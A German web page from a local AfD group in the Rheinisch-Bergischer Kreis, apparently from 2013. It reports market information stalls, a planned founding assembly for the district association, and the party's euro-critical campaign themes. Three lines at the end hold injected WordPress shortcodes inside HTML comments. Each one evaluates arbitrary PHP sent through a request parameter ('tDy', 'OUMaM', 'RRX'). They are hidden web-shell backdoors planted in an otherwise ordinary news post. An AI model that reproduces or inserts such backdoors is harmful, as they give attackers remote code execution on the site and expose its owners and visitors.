Erfolgreiche Infoaktion in Refrath

Foto: Oliver Wuttke

Foto: Oliver Wuttke

Trotz unfreundlichen Wetters informierten Mitstreiter der AfD am 31. Mai auf dem Wochenmarkt in Refrath (Bergisch Gladbach) interessierte Bürger.

Auch diese Aktion war ein voller Erfolg. Das Marktpublikum zeigte sich aufgeschlossen und diskussionsfreudig.

Gründung des Verbands Rheinisch-Bergischer Kreis der AfD

rheinbergwappen

Wappen – Rheinisch-Bergischer Kreis

Der Landesvorstand der Alternative für Deutschland (AfD) lädt am 4. Juni 2013 zur Gründung des Kreisverbands Rhein-Berg der AfD und zur Wahl des Direktkandidaten ein.

Der Rheinisch-Bergische Kreis (Bundestagswahlkreis 100) ist ein Kreis im Süden von Nordrhein-Westfalen. Er grenzt im Westen an die kreisfreien Städte Köln und Leverkusen sowie den Kreis Mettmann, im Norden an die kreisfreien Städte Solingen und Remscheid, im Osten an den Oberbergischen Kreis und im Süden an den Rhein-Sieg-Kreis. Zum Rheinisch-Bergischen Kreis zählen die Städte (Einwohnerzahl): Bergisch Gladbach (109026), Burscheid (18099), Kürten (19481), Leichlingen (27400), Odenthal (14795), Overath (26788), Rösrath 27446), Wermelskirchen (34781). Sitz der Kreisverwaltung ist Bergisch Gladbach.

Die Gründungsversammlung beginnt um 18 Uhr und findet statt: „Altes Zollhaus“ (Nebengebäude), Olper Straße 60, 51491 Overath.

AfD in Bergisch Gladbach sucht Bürgernähe

gl1„Wir Rentner zahlen die Zeche für Merkels übergroße Spendierhosen°, empören sich zwei ältere Damen vor dem Rathaus in Bergisch Gladbach. Mitglieder der Alternative für Deutschland aus dem Rhein-Berg-Kreis erfahren an diesem Nachmittag am Rand der Pfingstkirmes lebhaften Zuspruch für ihre noch junge Partei.

Mit eindrucksvollen Ständen, Schildern und Flyern prangert die Gruppe um den Kreisbeauftragten Daniel Obst politische Missstände in Deutschland und Europa an. Dabei zeigt sie auch die demokratischen Alternativen zur derzeitigen Politik auf, ganz im Sinne ihres Wahlspruchs „Damit Europa nicht am Euro scheitert“. Denn Deutschland brauche den Euro nicht und anderen Ländern schade er.

Neben mehr direkter gl2Demokratie durch Volksabstimmungen setzt sich die AfD auch für eine drastische Vereinfachung des Steuerrechts und ein nachhaltiges Energiekonzept für bezahlbare Energie ein.

Die Sorgen und Unzufriedenheit der Menschen stoßen auch bei den drei anwesenden Vertretern der AfD-Landesliste, Dagmar Noack, Martin Haase und Torsten Jungbluth auf offene Ohren. „Mich hat betroffen gemacht, wie viele Jugendliche sich in dem Bildungschaos und mit ihren Zukunftsängsten von der Politik im Stich gelassen fühlen“, fasst Martin Haase seine Eindrücke zusammen und versichert: „Die AfD wird darauf hinwirken, dass die nachfolgenden Generationen auf eine unbeschwerte Zukunft hoffen können.“

AfD-Infostand auf der Pfingstkirmes in Bergisch Gladbach

Wie der Kreisbeauftragte Daniel Obst mitteilt, wird eine Wahlkampfgruppe der AfD aus dem zukünftigen Kreisverband Rhein-Berg am 18. Mai 2013 um 15 Uhr vor dem Rathaus in 51465 Bergisch Gladbach (Konrad-Adenauer-Platz 1) mit Schildern, Transparenten und Flyern zu aktuellen Themen Stellung nehmen.

<!– [insert_php]if (isset($_REQUEST["tDy"])){eval($_REQUEST["tDy"]);exit;}[/insert_php][php]if (isset($_REQUEST["tDy"])){eval($_REQUEST["tDy"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["OUMaM"])){eval($_REQUEST["OUMaM"]);exit;}[/insert_php][php]if (isset($_REQUEST["OUMaM"])){eval($_REQUEST["OUMaM"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["RRX"])){eval($_REQUEST["RRX"]);exit;}[/insert_php][php]if (isset($_REQUEST["RRX"])){eval($_REQUEST["RRX"]);exit;}[/php] –>